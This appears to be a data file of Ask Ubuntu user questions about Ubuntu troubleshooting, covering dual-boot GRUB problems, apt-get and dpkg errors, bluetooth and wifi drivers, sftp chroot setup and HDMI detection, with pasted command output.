516287	can not find windows 8 option after dual booting with ubuntu 12.04 in grub	i succeded in installing ubuntu 12.04 alongside windows 8 but after that laptop booted to ubuntu w/o a grub selection .so i installed boot-repair to fi the problem just to find a grub menu without a windows 8 option but ubuntu and its memtest were present.during installation ubuntu promted me something about gpt which i thought wouldnt matter and so agreed with it . sudo fdisk -l gave the o/p disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0xbbf2addc device boot start end blocks id system /dev/sda1 * 2048 48828415 24413184 83 linux /dev/sda2 48830462 49827839 498689 5 extended partition 2 does not start on physical sector boundary . /dev/sda5 48830464 49827839 498688 82 linux swap / solaris please help ! ! ! also i can not see my hard disk in ubuntu ...
516288	ubuntu interaction with android	is there any way to have a littlemore sync/interaction between my ubuntu desktop and my android ? ideally i 'd like to use my desktop as a mini/personal cloud backup point but i 'd also like to push files between the two devices and , and this might be pushing it , use the camera on the droid from the desktop . if i could also remote access one from the other that would also be amazing ?
516292	steam blocking other software installation	i 've tried to unninstall steam by typing sudo apt-get purge steam and also remove steam . when i apt-get update , i get an error in the steam repo : err http : //repo.steampowered.com precise/steam amd64 packages and also err http : //repo.steampowered.com precise/steam i386 packages anytime i try to install another software , i ca n't . does anyone knows how can i fix this ?
516293	what modifications are required to mount the same root filesystem via nfs on several hosts ?	the idea is to have a single root filesystem which will be mounted ro on several hosts . imagine pxe boot with a standard kernel and ramdisk , then pivoting / to the nfs mount . assume $ home is also nfs . i assume i would need to mount a tmpfs on /tmp . anything else ? would i be able to set up a from job to update via chroot and have no trouble on next client boot ?
516294	sidebar in ubuntu 14.04.1	hi i 'd like to know before i download , is that left sidebar still there and not movable to bottom -without playing with codes . thanks .
516296	the following packages were automatically installed and are no longer required with important libs	the following packages were automatically installed and are no longer required : libopenal1 : i386 libsdl-ttf2.0-0 : i386 libgconf-2-4 : i386 libatk1.0-0 : i386 libstdc++5 : i386 libpam-winbind ttf-umefont gedit-common libgtksourceview-3.0-0 libxcomposite1 : i386 libgail18 : i386 libldap-2.4-2 : i386 libv4l-0 : i386 libqt4-qt3support : i386 libroken18-heimdal : i386 libunistring0 : i386 wine1.4-amd64 libcupsimage2 : i386 libgphoto2-port0 : i386 libidn11 : i386 libnss3 : i386 gir1.2-peas-1.0 libcaca0 : i386 gtk2-engines : i386 libgudev-1.0-0 : i386 libcairo-gobject2 : i386 libavc1394-0 : i386 linux-headers-3.2.0-52-generic linux-headers-3.2.0-52 wine1.4 libaio1 : i386 libsane : i386 odbcinst1debian2 : i386 libqt4-test : i386 libqt4-designer : i386 libsdl-mixer1.2 : i386 libcap2 : i386 libproxy1 : i386 ibus-gtk : i386 libdbus-glib-1-2 : i386 python-zeitgeist libtdb1 : i386 libasn1-8-heimdal : i386 libspeex1 : i386 libxslt1.1 : i386 libgomp1 : i386 libzeitgeist-1.0-1 libcapi20-3 : i386 libibus-1.0-0 : i386 libcairo2 : i386 libgssapi3-heimdal : i386 libcanberra-gtk-module : i386 libcanberra0 : i386 zeitgeist-datahub gtk2-engines-murrine : i386 zeitgeist libwavpack1 : i386 libqt4-opengl : i386 libsoup-gnome2.4-1 : i386 libv4lconvert0 : i386 gstreamer0.10-plugins-good : i386 nvidia-settings-304 librsvg2-common : i386 libiec61883-0 : i386 wine1.4-common libgdk-pixbuf2.0-0 : i386 libsdl-image1.2 : i386 wine-gecko1.4 wine-gecko1.4 : i386 libwind0-heimdal : i386 libpixman-1-0 : i386 libsdl1.2debian : i386 libxaw7 : i386 libgdbm3 : i386 winetricks libcurl3 : i386 libpeas-common libxinerama1 : i386 libesd0 : i386 libmikmod2 : i386 libgif4 : i386 gir1.2-gtksource-3.0 libreadline6 : i386 libxft2 : i386 libgtksourceview-3.0-common libcroco3 : i386 libpulse-mainloop-glib0 : i386 libaa1 : i386 libieee1284-3 : i386 libao4 : i386 libxmu6 : i386 libcanberra-gtk0 : i386 libvorbisfile3 : i386 esound-common language-pack-kde-en libxpm4 : i386 libqt4-svg : i386 libusb-0.1-4 : i386 libgail-common : i386 libhcrypto4-heimdal : i386 libraw1394-11 : i386 libnspr4 : i386 libshout3 : i386 libdv4 : i386 libhx509-5-heimdal : i386 kde-l10n-engb wine1.4-i386 : i386 gstreamer0.10-x : i386 libgettextpo0 : i386 libgd2-xpm : i386 libheimbase1-heimdal : i386 libsdl-net1.2 : i386 libjasper1 : i386 libgnome-keyring0 : i386 zeitgeist-core libxtst6 : i386 gtk2-engines-pixbuf : i386 libtag1c2a : i386 librsvg2-2 : i386 libssl0.9.8 : i386 libmpg123-0 libmpg123-0 : i386 libmad0 : i386 libpeas-1.0-0 libsasl2-2 : i386 gtk2-engines-oxygen : i386 xaw3dg : i386 libpango1.0-0 : i386 libheimntlm0-heimdal : i386 libpulsedsp : i386 winbind libxcb-render0 : i386 libodbc1 : i386 libexif12 : i386 libqt4-scripttools : i386 librtmp0 : i386 libxp6 : i386 libxcursor1 : i386 libxcb-shm0 : i386 language-pack-kde-en-base libsasl2-modules : i386 libxrandr2 : i386 libgtk2.0-0 : i386 libltdl7 : i386 libkrb5-26-heimdal : i386 glib-networking : i386 libsoup2.4-1 : i386 libgphoto2-2 : i386 libtag1-vanilla : i386 libaudiofile1 : i386 use 'apt-get autoremove ' to remove them . if i run autoremove v @ gt680 : ~ $ sudo apt-get autoremove reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : esound-common gedit-common gir1.2-gtksource-3.0 gir1.2-peas-1.0 glib-networking : i386 gstreamer0.10-plugins-good : i386 gstreamer0.10-x : i386 gtk2-engines : i386 gtk2-engines-murrine : i386 gtk2-engines-oxygen : i386 gtk2-engines-pixbuf : i386 ibus-gtk : i386 kde-l10n-engb language-pack-kde-en language-pack-kde-en-base libaa1 : i386 libaio1 : i386 libao4 : i386 libasn1-8-heimdal : i386 libatk1.0-0 : i386 libaudiofile1 : i386 libavc1394-0 : i386 libcaca0 : i386 libcairo-gobject2 : i386 libcairo2 : i386 libcanberra-gtk-module : i386 libcanberra-gtk0 : i386 libcanberra0 : i386 libcap2 : i386 libcapi20-3 : i386 libcroco3 : i386 libcupsimage2 : i386 libcurl3 : i386 libdbus-glib-1-2 : i386 libdv4 : i386 libesd0 : i386 libexif12 : i386 libgail-common : i386 libgail18 : i386 libgconf-2-4 : i386 libgd2-xpm : i386 libgdbm3 : i386 libgdk-pixbuf2.0-0 : i386 libgettextpo0 : i386 libgif4 : i386 libgnome-keyring0 : i386 libgomp1 : i386 libgphoto2-2 : i386 libgphoto2-port0 : i386 libgssapi3-heimdal : i386 libgtk2.0-0 : i386 libgtksourceview-3.0-0 libgtksourceview-3.0-common libgudev-1.0-0 : i386 libhcrypto4-heimdal : i386 libheimbase1-heimdal : i386 libheimntlm0-heimdal : i386 libhx509-5-heimdal : i386 libibus-1.0-0 : i386 libidn11 : i386 libiec61883-0 : i386 libieee1284-3 : i386 libjasper1 : i386 libkrb5-26-heimdal : i386 libldap-2.4-2 : i386 libltdl7 : i386 libmad0 : i386 libmikmod2 : i386 libmpg123-0 libmpg123-0 : i386 libnspr4 : i386 libnss3 : i386 libodbc1 : i386 libopenal1 : i386 libpam-winbind libpango1.0-0 : i386 libpeas-1.0-0 libpeas-common libpixman-1-0 : i386 libproxy1 : i386 libpulse-mainloop-glib0 : i386 libpulsedsp : i386 libqt4-designer : i386 libqt4-opengl : i386 libqt4-qt3support : i386 libqt4-scripttools : i386 libqt4-svg : i386 libqt4-test : i386 libraw1394-11 : i386 libreadline6 : i386 libroken18-heimdal : i386 librsvg2-2 : i386 librsvg2-common : i386 librtmp0 : i386 libsane : i386 libsasl2-2 : i386 libsasl2-modules : i386 libsdl-image1.2 : i386 libsdl-mixer1.2 : i386 libsdl-net1.2 : i386 libsdl-ttf2.0-0 : i386 libsdl1.2debian : i386 libshout3 : i386 libsoup-gnome2.4-1 : i386 libsoup2.4-1 : i386 libspeex1 : i386 libssl0.9.8 : i386 libstdc++5 : i386 libtag1-vanilla : i386 libtag1c2a : i386 libtdb1 : i386 libunistring0 : i386 libusb-0.1-4 : i386 libv4l-0 : i386 libv4lconvert0 : i386 libvorbisfile3 : i386 libwavpack1 : i386 libwind0-heimdal : i386 libxaw7 : i386 libxcb-render0 : i386 libxcb-shm0 : i386 libxcomposite1 : i386 libxcursor1 : i386 libxft2 : i386 libxinerama1 : i386 libxmu6 : i386 libxp6 : i386 libxpm4 : i386 libxrandr2 : i386 libxslt1.1 : i386 libxtst6 : i386 libzeitgeist-1.0-1 linux-headers-3.2.0-52 linux-headers-3.2.0-52-generic nvidia-settings-304 odbcinst1debian2 : i386 python-zeitgeist ttf-umefont winbind wine-gecko1.4 wine-gecko1.4 : i386 wine1.4 wine1.4-amd64 wine1.4-common wine1.4-i386 : i386 winetricks xaw3dg : i386 zeitgeist zeitgeist-core zeitgeist-datahub 0 upgraded , 0 newly installed , 150 to remove and 288 not upgraded . after this operation , 425 mb disk space will be freed . do you want to continue [ y/n ] ? n abort . but it seems that there are important libs here ! why does apt-get want to delete them ?
516297	upstart - start-stop-daemon vs exec	i am writing my first init conf file using upstart . i would like to know what are the advantages of starting my daemon using start-stop-daemon . why is it better then just : exec /path/to/my/daemon { args } is there any obligation to use start-stop-daemon to start daemons ?
516301	enabling access of locally hosted websites through squid	i have setup a squid proxy in my office.we have to connect to another company vpn and have to access locally hosted websites in that company.the problem is that through squid we can not access those locally hosted website.everything except works great.any suggestions ?
516303	tiling windows horizontally and vertically under lubuntu ( lxde/openbox ) ?	is there any way i can tile two windows horizontally ( ⬒ ) or vertically ( ◧ ) under lubuntu/lxde/openbox ? maybe via a keyboard shortcut or panel button ?
516307	how do i change default wine browser to native ubuntu browser instead of ie ?	am running wine 1.6.2 for use with evernote . some of my notes have links in them and by default they are launched using the wine version of ie . i 'd rather use my native browser ( s ) firefox of chrome . how does one change it so that links are opened instead by my local browsers ?
516308	how can i reduce the memory	how can i reduce the memory allocated for a given program from the terminal ? what i mean is if i have a a.out executable file , how can i make it run in a less memory from the terminal ( with out using any special applications ) $ ./a.out fooo so that my program a.out runs on very less space .
516309	sudo apt-get autoremove fails after upgrade to 14.04.1 lts - can not call rmtree on symbolic link	after upgrading to trusty , i have had a problem with python that affects apt-get . if i run apt-get autoremove , i get the output below : sudo apt-get autoremove reading package lists ... 0 % reading package lists ... 100 % reading package lists ... done building dependency tree ... 0 % building dependency tree ... 0 % building dependency tree ... 50 % building dependency tree ... 50 % building dependency tree ... 81 % building dependency tree reading state information ... 0 % reading state information ... 0 % reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 45 not upgraded . 3 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up python-support ( 1.0.15 ) ... traceback ( most recent call last ) : file `` /usr/sbin/update-python-modules '' , line 449 , in < module > shutil.rmtree ( dir ) file `` /usr/lib/python2.7/shutil.py '' , line 232 , in rmtree onerror ( os.path.islink , path , sys.exc_info ( ) ) file `` /usr/lib/python2.7/shutil.py '' , line 230 , in rmtree raise oserror ( `` can not call rmtree on a symbolic link '' ) oserror : can not call rmtree on a symbolic link dpkg : error processing package python-support ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of python-matplotlib : python-matplotlib depends on python-support ( > = 0.90.0 ) ; however : package python-support is not configured yet . dpkg : error processing package python-matplotlib ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . dpkg : dependency problems prevent configuration of pitivi : pitivi depends on python-matplotlib ; however : package python-matplotlib is not configured yet . dpkg : error processing package pitivi ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : python-support python-matplotlib pitivi e : sub-process /usr/bin/dpkg returned an error code ( 1 ) when i try sudo apt-get update , it appears to run correctly , but it looks like i have the same problem when it tries to update python-support . i get the same errors .
516314	xubuntu 14.04 disable desktop and panel	i 'm looking to test a xubuntu 14.04 in the library public lab . i 'm looking for an option to disable right click on the panel and desktop . i google it and found something about the locking the panel : https : //sites.google.com/site/easylinuxtipsproject/xfce # toc-lock-the-panels-kiosk-mode- but this does n't really work as expected . my goal is to create a separate public account for xubuntu and had the public log on automatically . the public user account will be restrict to create folders on desktop or disable right click on desktop and disable right click on panel or disable adding new icons on panel . thanks in advance !
516315	ubuntu 14.04 kvm guest issue with static ip address	i have installed a kvm server and host in ubuntu both with release 14.04 . i did configured the server according to the wiki and it is working as expected . the issue i am having is that after installing the guest with static ip addressing i can reach the gw but when the gw replies back it doesnt reach the guest as i did some traffic analisys , the same for dns requests , for my surprise dhcp works without any problem . can anybody point me down on what could be the issue or where i can look for a possible answer .
516317	writable sftp directory restrictions	i want to create a directory for a user so they can sftp to my server and automatically be in that directory . ideally this directory would have group write permissions so this user can upload a file and another user can delete it later on . i created the directory /var/dump , changed the group to dumper and made it group writable with an acl . to have this user automatically connect to this directory via ssh , in my sshd_config i have : match user dumper chrootdirectory /var/dump forcecommand internal-sftp allowtcpforwarding no when i try to connect i keep getting the error write failed : broken pipe could n't read packet : connection reset by peer i looked it up , and it seems that this is caused by root not owning directories up to the sftp directory . however , root owns /var and it is not group writable . i need /var/dump to be group writable . is there any way to have a user automatically sftp into a group writable directory ?
516318	hcitool and bluez ca n't find bluetooth	hcitool output is : v @ gt680 : ~ $ hcitool dev devices : v @ gt680 : ~ $ and hciconfig : v @ gt680 : ~ $ hciconfig hci0 : type : br/edr bus : usb bd address : 74 : f0:6d : d3:00 : a8 acl mtu : 310:10 sco mtu : 64:8 down rx bytes:473 acl:0 sco:0 events:19 errors:0 tx bytes:80 acl:0 sco:0 commands:19 errors:0 v @ gt680 : ~ $ also : v @ gt680 : ~ $ sudo service bluetooth status bluetooth stop/waiting v @ gt680 : ~ $ dmesg |grep -i bluetooth [ 9.392317 ] bluetooth : core ver 2.16 [ 9.392333 ] bluetooth : hci device and connection manager initialized [ 9.392335 ] bluetooth : hci socket layer initialized [ 9.392337 ] bluetooth : l2cap socket layer initialized [ 9.392342 ] bluetooth : sco socket layer initialized [ 9.423148 ] bluetooth : generic bluetooth usb driver ver 0.6 [ 11.472365 ] init : bluetooth main process ( 1481 ) terminated with status 1 [ 11.472388 ] init : bluetooth main process ended , respawning [ 11.686558 ] bluetooth : rfcomm tty layer initialized [ 11.686563 ] bluetooth : rfcomm socket layer initialized [ 11.686565 ] bluetooth : rfcomm ver 1.11 [ 11.689635 ] init : bluetooth main process ( 1540 ) terminated with status 1 [ 11.689657 ] init : bluetooth main process ended , respawning [ 11.698703 ] init : bluetooth main process ( 1548 ) terminated with status 1 [ 11.698722 ] init : bluetooth main process ended , respawning [ 11.707810 ] init : bluetooth main process ( 1556 ) terminated with status 1 [ 11.707835 ] init : bluetooth main process ended , respawning [ 11.716773 ] init : bluetooth main process ( 1564 ) terminated with status 1 [ 11.716794 ] init : bluetooth main process ended , respawning [ 11.725861 ] init : bluetooth main process ( 1572 ) terminated with status 1 [ 11.725881 ] init : bluetooth main process ended , respawning [ 11.734754 ] init : bluetooth main process ( 1580 ) terminated with status 1 [ 11.734775 ] init : bluetooth main process ended , respawning [ 11.743825 ] init : bluetooth main process ( 1588 ) terminated with status 1 [ 11.743846 ] init : bluetooth main process ended , respawning [ 11.752997 ] init : bluetooth main process ( 1596 ) terminated with status 1 [ 11.753028 ] init : bluetooth main process ended , respawning [ 11.761835 ] init : bluetooth main process ( 1604 ) terminated with status 1 [ 11.761865 ] init : bluetooth main process ended , respawning [ 11.770855 ] init : bluetooth main process ( 1612 ) terminated with status 1 [ 11.770885 ] init : bluetooth respawning too fast , stopped v @ gt680 : ~ $ lsusb |grep bluetooth bus 001 device 003 : id 0a12:0001 cambridge silicon radio , ltd bluetooth dongle ( hci mode ) v @ gt680 : ~ $ but what is problem still bluez can not find and bluetoothd not working as a daemon
516320	seaching app online to play avi got error	can anyone help me ? gdbus.error : org.freedesktop.dbus.python.unicodedecodeerror : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/defer/__init__.py '' , line 489 , in _inline_callbacks result = gen.send ( result ) file `` /usr/lib/python2.7/dist-packages/sessioninstaller/core.py '' , line 1086 , in _install_mime_types details , score ) file `` /usr/lib/python2.7/dist-packages/sessioninstaller/core.py '' , line 363 , in add_confirm_package score , _is_package_restricted ( pkg ) ) file `` /usr/lib/python2.7/dist-packages/sessioninstaller/core.py '' , line 348 , in add_confirm desc = utils.get_package_desc ( name , summary ) file `` /usr/lib/python2.7/dist-packages/sessioninstaller/utils.py '' , line 77 , in get_package_desc markup += `` \n % s '' % app_comment unicodedecodeerror : 'ascii ' codec ca n't decode byte 0xe6 in position 1 : ordinal not in range ( 128 )
516321	eclipse window is not fully displayed	some eclipse windows is not fully displayed . example : new project , new class ... . it is lost some of the items . screenshot :
516329	installing ap hotspot in sony vaio	i am using ubuntu 14.04 in sony vaio when i am installing ap hotspot it is telling `` your wireless card or driver does not support access point mode '' . how can i fix this problem
516331	system setting is not working and it does n't show anything	this is what i get when i go to the system settings ( ubuntu 14.04 ) : i tried to reinstall ubuntu-desktop et similia but anything changed but if i uninstall ubuntu-desktop , system settings shows me a few options like this : what should i do ? edit : i have already tried sudo apt-get install -- reinstall gnome-control-center sudo apt-get install -- reinstall gnome-settings-daemon-schemas sudo apt-get install -- reinstall ubuntu-desktop
516333	how to improve my disk partition ?	i want to improve my disk partition . i get an exclamation point on one of the partitions and what is ? please explain me first and give a solution . and it does not affect me , but i would like to know what happens ? can i install slackware installed ubuntu and windows 8.1 ( mode uefi / dual boot ) ? thank you !
516334	how to run papi rapl on intel atom	i am trying to run the rapl of papi-5.3.2 on intel atom ( intel ( r ) atom ( tm ) cpu c2758 @ 2.40ghz ) . when i try to run make file in the rapl , msg i get is '' make : * no rule to make target -l../../.. ' , needed byrapl_basic ' . stop . '' can you please guide me how to run the rapl on atom ? i am using ubuntu version 13.10 .
516340	ubuntu 14.04 dell xps15 hdmi not detected	after some actualization my hdmi died . can someone help me ? ubuntu 14.04 lts dell xps15 l502x graphic driver x.org x server - noveau -- on system config / displays . : : . only appears the integrated screen , and if i connect hdmi - > detect screens nothing happens . xrandr -q screen 0 : minimum 8 x 8 , current 1366 x 768 , maximum 32767 x 32767 lvds1 connected primary 1366x768+0+0 ( normal left inverted right x axis y axis ) 344mm x 194mm 1366x768 59.6*+ 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 dp1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) vga1 disconnected ( normal left inverted right x axis y axis ) virtual1 disconnected ( normal left inverted right x axis y axis ) lspci | grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf108m [ geforce gt 540m ] ( rev a1 ) uname -r 3.13.0-34-generic i tried to install nvidia proprietary drivers ( 304 , 331 and 342 ) but they does n't work ( i get black screen ) , so i use nouveau for now .
516343	move or install apps on hdd not ssd	i find a few threads that essentially say `` you do n't have to do that '' , so here goes : i already can find how to move the home folder for a single user off my ssd . i think i have an idea how to do that for multiple users , but have n't tried it yet . the big one is , with only a 128gb ssd i do n't want to load up too many applications on it . once i start getting a slew of games from steam , i 'm bound to fill up and slow down the ssd . i 'd like a good way to move the directory those applications will install in over to the 2tb hdd ( sdb1 ) . ssds run slow if you fill them up , so please do n't tell me to just let it go . this is a real issue for more and more of us now that you can get a ssd like mine for around $ 60 . what i suspect i can do , but am not so sure , is to use the same technique for moving the home folder to move the usr directory , or maybe better yet just usr\games ( if that 's where steam will put the games i get ) over to the hdd . could someone give an example of doing that ? i 'd move it right after a fresh install , if that simplifies things .
516344	how do i create simplistic window-like elements in a command-line program ?	when i execute sudo dpkg-reconfigure lightdm in the terminal i see a simplistic window-like listmenu . is there an way to make something like that in c++ ? this looks something like :
516347	no network device available on ubuntu 14.04	all of a sudden after an update the wireless icon shows no device detected , i was using wifi at the time . so far have not been able to connect to any network . my network device info is : product : ar9485 wireless network adapter vendor : qualcomm atheros
516352	how to fix segmentation fault starting matlab after 14.04 upgrade ?	i upgraded my desktop from ubuntu 12.04 lts to 14.04 lts . i have installed matlab before and after updating ubuntu to a new version . when i type matlab in the terminal it shows : segmentation fault ( core dumped ) how exactly can this be solved ? everything else on this system is working fine , but starting matlab from the terminal itself shows this type of error . this started in 14.04 -- i did not have this problem in ubuntu 12.04 lts .
516353	what are the advantages and disadvantages of mounting various directories on separate partitions ?	while installing ubuntu with the `` something else '' option , i found out that there are many folders that can be mounted on separate partitions , as you can see in the image below . so what are the advantages and disadvantages of mounting these folders ( or directories ) on separate partitions ? specifically the directories are /boot /home /tmp /usr /var /srv /opt /usr/local
516355	encountered a section with no package	i 've recently installed ubuntu 14.04 . i was quit satisfied with it till yesterday when i could n't open ubuntu software center . i 've received a notification like this : e : encountered a section with no package : header e : problem with mergelist /var/lib/dpkg/status e : the package lists or status file could not be parsed or opened . i 'll be very grateful if anyone can give me a solution to this problem . n.b . i 've a previously installed windows 8 ( which has n't been activated yet ) along with ubuntu . also i have n't created any backup for ubuntu yet
516358	pcmanfm custom directory icons	i 'd like pcmanfm to show custom icons for my work folders ; for example to show the androiddev folder in this picture ( italian locale here ) : like this ( gimp used ) : i saw the other folder icons are located in the /usr/share/icons/humanity/places/ directory ; for example the image folder icon is folder_images.svg ( or folder-images.svg ) . how do pcmanfm knows that for `` immagini '' folder he has to use the folder-images.svg icon ? how can i instruct pcmanfm to use for `` androiddev '' folder the folder-myicon.svg ?
516361	12.04 > 14.04 upgrade leaks timestamp bug to windows partition- how best to report this ?	i am unsure how to report this bug , as i do n't know what facts are needed in a dual boot situation that affects both sides- one being windows . the laptop is an toshiba running a dual core pentium . the windows vista partition and the ubuntu 12.04 partition have both always operated flawlessly . i upgraded to 14.04 when a notice from the software center appeared on the desktop ; i saw no error reports during the upgrade ( and was pleased that the time it took was far less than that mentioned in the instruction panel ) . i need to report a crossover bug however : if windows is booted up ( cold start ) after a session with the upgraded 14.04 , the timestamp notification shown in the lower right toolbar , and i assume all created files , has been set back 5 hours ( minutes stay correct ) to gmt i think . this does n't happen every time , but is frequent enough to say it 's repeatable . the reverse- windows changing the time displayed in ubuntu- does n't occur . is there some simple setting i am missing ? i 'm concerned because there is a sort of implied promise that ubuntu does n't 'mess ' with windows , but it 's possible that the flaw is in windows ... what other factors might be relevant ? thanks for any advice !
516362	what graphic drivers i need to install so my both graphic cards could run ?	im new ubuntu user so i dont know much about it , i searched all over internet how and what drivers to install so my dual gpu lapotop could run both of them . i tried most of the methods still no luck . is amd crossfire really working on ubuntu 14.04 lts ? i tried so many times that i have no other ideas what to do , so im asking help here : d here is what cards i have in my laptop : advanced micro devices , inc. [ amd/ati ] beavercreek [ radeon hd 6520g ] advanced micro devices , inc. [ amd/ati ] thames [ radeon hd 7500m/7600m series ] if needed any other info , to help me , just ask : d t.y
516363	auto creating accounts	i 'm wondering if there is any way to configure ubuntu or install special software which could allow to automatically create user account when user login first time ( without any special privileges , only standard user ) . the scenario is to allow any user which has physical access to computer to login on it ( with gui ) . using guest session is not enough because each user should has it 's own profile and folder . i know there is a way combined with ldap authentication for creating accounts and home folders for valid users . i would prefer to not use ldap mechanism because i want skip process of setting up accounts for each user on ldap server . i do not expect full solution ( but if someone accidentally has sth like that it could be nice : ) ) maybe some tips what tools or system modules could i use/modify to achieve this . i will be grateful for any help . thanks in advance .
516367	how to replicate my server environment and directory structure using vagrant	i am a developer by trade but am not used to configuring vm 's and servers , so i apologize if these questions seem rather novice . i have recently started trying to use vagrant for local development of my projects , before pushing them up onto our remote staging ( and later live ) servers . however , i am not sure how i can configure vagrant to resemble the structure of our live servers as closely as possible . the live server is configured as so : / /web_www /home /w-example /www index.php /wep_apps w-example is a sub site off of the main domain ... so to access the index.php file in w-example , i go to www.maindomain.com/~w-example/ , which would bring me to w-example/index.php i 'm unsure what configuration i need to make in my vagrant server to replicate this setup . optimally i would like to be able to do as follows to access the w-example project above : www.maindomain.local/~w-example/ any help is much appreciated . thank you .
516372	vlc 2.1.4 audio `` pumping '' /compressed	on ubuntu 14.04 + vlc 2.1.4 , i hear prominent audio compression when playing back mp3 audio . i have tried turning on `` allow louder than 100 % '' in the sound setting thinking that , perhaps , having this turned off might actually cause some compressor/limiter action in the audio system , but the pumping effect persisted . playing the same tracks in rhythmbox appears to work great . i prefer vlc but the output is really unacceptable . any workaround known for this ?
516375	address bar in firefox greyed/blacked out	i have actually had this happen already once when i first installed ubuntu 12.04 but was able to fix the issue by going into about : config and changing an entry to false . however i have now upgraded to ubuntu 14.04 running kde desktop and have the same issue which i was unable to resolve using the fix i had used previously . i also tried another fix that was mentioned on lifehacker.com where it tells you to try and change a different config setting to = false and still had no luck , i also closed firefox completely after making each change and reopened to see the issue was still occurring and also confirmed that the values of both the strings i had modified to =false were still indeed set to false . anyone got any ideas here ?
516376	wifi is not working	i tried many things , i suggested many questions here , but still could not find the solution . please find this info i got it 00:00.0 host bridge [ 0600 ] : intel corporation core processor dram controller [ 8086:0044 ] ( rev 02 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation core processor integrated graphics controller [ 8086:0046 ] ( rev 02 ) 00:16.0 communication controller [ 0780 ] : intel corporation 5 series/3400 series chipset heci controller [ 8086:3b64 ] ( rev 06 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 5 series/3400 series chipset usb2 enhanced host controller [ 8086:3b3c ] ( rev 05 ) 00:1b.0 audio device [ 0403 ] : intel corporation 5 series/3400 series chipset high definition audio [ 8086:3b56 ] ( rev 05 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 5 series/3400 series chipset pci express root port 1 [ 8086:3b42 ] ( rev 05 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation 5 series/3400 series chipset pci express root port 2 [ 8086:3b44 ] ( rev 05 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 5 series/3400 series chipset usb2 enhanced host controller [ 8086:3b34 ] ( rev 05 ) 00:1e.0 pci bridge [ 0604 ] : intel corporation 82801 mobile pci bridge [ 8086:2448 ] ( rev a5 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation mobile 5 series chipset lpc interface controller [ 8086:3b09 ] ( rev 05 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 5 series/3400 series chipset 4 port sata ahci controller [ 8086:3b29 ] ( rev 05 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 5 series/3400 series chipset smbus controller [ 8086:3b30 ] ( rev 05 ) 00:1f.6 signal processing controller [ 1180 ] : intel corporation 5 series/3400 series chipset thermal subsystem [ 8086:3b32 ] ( rev 05 ) 02:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11bgn wireless network adapter [ 14e4:4727 ] ( rev 01 ) 03:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 02 ) ff:00.0 host bridge [ 0600 ] : intel corporation core processor quickpath architecture generic non-core registers [ 8086:2c62 ] ( rev 02 ) ff:00.1 host bridge [ 0600 ] : intel corporation core processor quickpath architecture system address decoder [ 8086:2d01 ] ( rev 02 ) ff:02.0 host bridge [ 0600 ] : intel corporation core processor qpi link 0 [ 8086:2d10 ] ( rev 02 ) ff:02.1 host bridge [ 0600 ] : intel corporation core processor qpi physical 0 [ 8086:2d11 ] ( rev 02 ) ff:02.2 host bridge [ 0600 ] : intel corporation core processor reserved [ 8086:2d12 ] ( rev 02 ) ff:02.3 host bridge [ 0600 ] : intel corporation core processor reserved [ 8086:2d13 ] ( rev 02 ) is there any one who can help me to resolve this issue .
516377	slow bash tab completion	my bash shell 's tab completion is very slow , usually taking 1-2 seconds per completion . this only seems to happen when i 'm using my laptop from work . tab completion is very speedy when using my laptop from home . i 've tried looking around in ~/.bashrc and /etc/bash_completion.d , but i have not found a solution as of yet .
516378	apt-get upgrade complains about authentication of packages	i am currently using ubuntu 14.04.1 server . when issuing a : sudo apt-get upgrade apt-get says : warning : the following packages can not be authenticated this is a fresh install from an iso that used to deploy 6 other vms with . the only thing i am seeing is this vm because it is in a different location is pointing to a different server for updates . i have tried reinstalling the vm 3 times . i have rebuilt the /var/lib/apt/lists directory . i have also tried updating the keys using : sudo apt-key update sudo apt-key net-update sudo aptitiude reinstall ubuntu-keyring the packages that it is trying to update are : the following packages will be upgraded : accountsservice apport byobu gir1.2-glib-2.0 krb5-locales libaccountsservice0 libc-bin libc6 libgirepository-1.0-1 libgssapi-krb5-2 libk5crypto3 libkrb5-3 libkrb5support0 libpam-systemd libssl1.0.0 libsystemd-daemon0 libsystemd-login0 libudev1 multiarch-support net-tools openssl python3-apport python3-distupgrade python3-gi python3-problem-report screen systemd-services ubuntu-release-upgrader-core udev after i click `` y '' this is what i get : warning : the following packages can not be authenticated ! libc-bin libc6 libssl1.0.0 udev libudev1 libk5crypto3 libgssapi-krb5-2 libkrb5-3 libkrb5support0 libpam-systemd systemd-services libsystemd-daemon0 libsystemd-login0 multiarch-support net-tools accountsservice libaccountsservice0 libgirepository-1.0-1 gir1.2-glib-2.0 krb5-locales openssl ubuntu-release-upgrader-core python3-distupgrade python3-gi python3-problem-report python3-apport apport screen byobu install these packages without verification ? [ y/n ] i am concerned that i am downloading compromised packages . also apt-get update runs fine without any warnings .
